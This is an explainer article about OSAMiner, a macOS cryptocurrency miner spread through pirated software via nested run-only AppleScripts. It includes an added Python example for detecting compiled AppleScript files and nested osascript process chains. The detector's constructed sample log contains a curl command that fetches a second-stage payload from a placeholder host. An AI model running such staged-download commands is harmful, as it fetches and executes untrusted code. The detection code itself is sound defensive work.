OSAMiner was one of the sneakiest strains of malware to affect macOS devices, staying active for almost five years. It used a fairly ingenious trick to avoid detection and continued to prey on the hardware resources of Macs across the globe.

While many people think that macOS devices are impenetrable, this long-running campaign stumped malware researchers for almost five years. But what is OSAMiner? And how did it evade detection for so long?

What Is OSAMiner Malware?

OSAMiner is a cryptocurrency miner that managed to infect macOS devices for almost five years. It became incredibly popular in the malware research circles because of its ability to resist full analysis for almost half a decade.

While it officially came to light in 2021 in a report by the security firm SentinelOne, OSAMiner had been infecting macOS devices since 2015. In 2018, Chinese security sites first reported a trojan that targeted macOS devices to mine Monero, a popular privacy-focused cryptocurrency.

What makes OSAMiner so special compared to other crypto miners is that it went virtually undetected, as malware researchers were unable to retrieve its entire code (which prevented analysis).

How Did OSAMiner Malware Infect Macs?


OSAMiner spread mainly through pirated games and software and primarily targeted communities in the Asia-Pacific and Chinese regions. Many people download pirated software and uncensored content through underground torrent sites, which made it easier for OSAMiner to spread.

It spread most commonly through popular pirated software, like Microsoft Office for Mac, and games like League of Legends. The installers would download and execute an AppleScript in the background while people installed the pirated software.

That first script was a run-only AppleScript (more on that below). It would download and run a second run-only AppleScript, which in turn downloaded and ran a third and final AppleScript that installed the miner on the macOS device. Splitting the infection into nested stages like this made tracking it incredibly difficult.

How OSAMiner Managed to Go Undetected

To better understand how OSAMiner could evade detection for so long, it's important to first talk about run-only AppleScripts (which is what OSAMiner is built on). Simply put, AppleScripts are powerful tools that allow automation and provide greater control over software on macOS.

They use the AppleScript language, which is designed to be understandable and easy to read. A run-only AppleScript is a compiled version of an AppleScript that is meant to be executed but not read or modified.

When an AppleScript is saved as a run-only script, it is compiled into a form that can be understood by the computer but is difficult for humans to read (bytecode format). This not only prevents others from seeing or modifying the script's source code but also helps protect any sensitive information that might be contained within the script.

The phrase "run-only" says it plainly: these scripts aren't meant to be read or edited in the first place. And because humans couldn't read the code, security researchers never got a full picture of OSAMiner, and it went undetected.
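The nested chain of run-only scripts described above and the bytecode format of compiled AppleScripts both leave traces a defender can look for. The following Python example is added here and is not code from the article or from SentinelOne's report: it checks whether a file blob carries the `FasdUAS` header that compiled `.scpt` files begin with (run-only scripts share that header, they simply carry no recoverable source), and it walks a table of process events to flag `osascript` processes that were themselves launched by an `osascript` ancestor, which is the nesting pattern the article describes. The process events, the `Installer` process name, and the paths in the command lines are constructed sample data, and the function names are the example's own.

```python
"""Added example: spot compiled AppleScript files and nested osascript process chains."""
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Compiled AppleScript (.scpt) files start with this magic string. A script
# saved as run-only has the same header; what is missing is the source text.
COMPILED_APPLESCRIPT_MAGIC = b"FasdUAS "


def is_compiled_applescript(blob: bytes) -> bool:
    """Return True if the bytes look like a compiled AppleScript file."""
    return blob.startswith(COMPILED_APPLESCRIPT_MAGIC)


@dataclass(frozen=True)
class ProcEvent:
    """One process-start record as an EDR or audit log might emit it (constructed)."""
    pid: int
    ppid: int
    name: str      # executable name as logged
    cmdline: str   # full command line as logged


def ancestry(events: Dict[int, ProcEvent], pid: int) -> List[ProcEvent]:
    """Return the chain from the outermost known ancestor down to pid.

    The visited set guards against malformed logs where ppid links form a loop.
    """
    chain: List[ProcEvent] = []
    seen = set()
    cur = events.get(pid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(cur)
        cur = events.get(cur.ppid)
    return list(reversed(chain))


def nested_osascript(events: List[ProcEvent],
                     min_depth: int = 2) -> List[Tuple[int, List[str]]]:
    """Flag osascript processes whose ancestry holds at least min_depth osascripts.

    A single osascript run by a user is normal; an osascript spawned by another
    osascript (which was spawned by an installer) matches the staged chain the
    article describes. Returns (pid, [process names root..leaf]) per hit.
    """
    by_pid = {e.pid: e for e in events}
    hits: List[Tuple[int, List[str]]] = []
    for e in events:
        if e.name != "osascript":
            continue
        chain = ancestry(by_pid, e.pid)
        if sum(1 for p in chain if p.name == "osascript") >= min_depth:
            hits.append((e.pid, [p.name for p in chain]))
    return hits


# Constructed sample events: a pirated-software installer kicks off a staged
# osascript chain, plus one unrelated, benign osascript run by the user.
SAMPLE_EVENTS = [
    ProcEvent(200, 1,   "Installer", "/Volumes/Office/Install.app/Contents/MacOS/Install"),
    ProcEvent(201, 200, "osascript", "osascript /tmp/stage1.scpt"),
    ProcEvent(202, 201, "curl",      "curl -s http://example.invalid/stage2"),
    ProcEvent(203, 201, "osascript", "osascript /tmp/stage2.scpt"),
    ProcEvent(204, 203, "osascript", "osascript /tmp/stage3.scpt"),
    ProcEvent(300, 1,   "osascript", "osascript /Users/me/backup.scpt"),
]


if __name__ == "__main__":
    print("compiled header check:",
          is_compiled_applescript(b"FasdUAS 1.101.10\x00\x00"))
    for pid, names in nested_osascript(SAMPLE_EVENTS):
        print(f"pid {pid}: {' -> '.join(names)}")
```

In the sample data only the two inner stages (pids 203 and 204) are flagged; the first-stage script and the user's own backup script each have a single `osascript` in their ancestry and pass the threshold. The header check is a quick triage step for files dropped in temporary directories or referenced from LaunchAgents; it does not by itself say whether the script is malicious, only that it is compiled bytecode rather than readable source.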

Who Discovered the OSAMiner Infection?

The security research firm that discovered OSAMiner, SentinelOne, published the full attack chain and a detailed list of Indicators of Compromise (IoCs) outlining how OSAMiner was able to infect Macs.

An important thing to note here is that OSAMiner continued to evolve as the attackers behind the malware continued to gain more confidence. Two Chinese security firms did report on OSAMiner back in August and September 2018, though their reports didn't even come close to what OSAMiner was capable of.


They did report on "osascript" being detected, but the reports didn't even make a ripple in the security research circles. The main reason for this was that they couldn't retrieve the full malware code.

Does OSAMiner Still Pose a Security Risk?

Cryptojacking is a serious concern and can hit any device. Nested run-only AppleScripts are widely considered to be a serious attack vector, and while Apple has taken steps to improve security on its devices, malware like OSAMiner still poses a risk.

Even though Macs come with various security features, it's still essential for users to install an antivirus. Ideally, the best way to prevent malware infections is to avoid downloading pirated software or games on your device. Always buy from original sources to mitigate the risk of infection.

Regularly Run Scans to Protect Your Mac

If you browse the internet without any protection, you must scan your system for malware regularly. Malware infections like OSAMiner are clear examples of how sophisticated hackers are getting and how much damage they can cause over time.

There are many ways to protect your Mac from malware, and it's important that you regularly install new security updates as Apple releases them.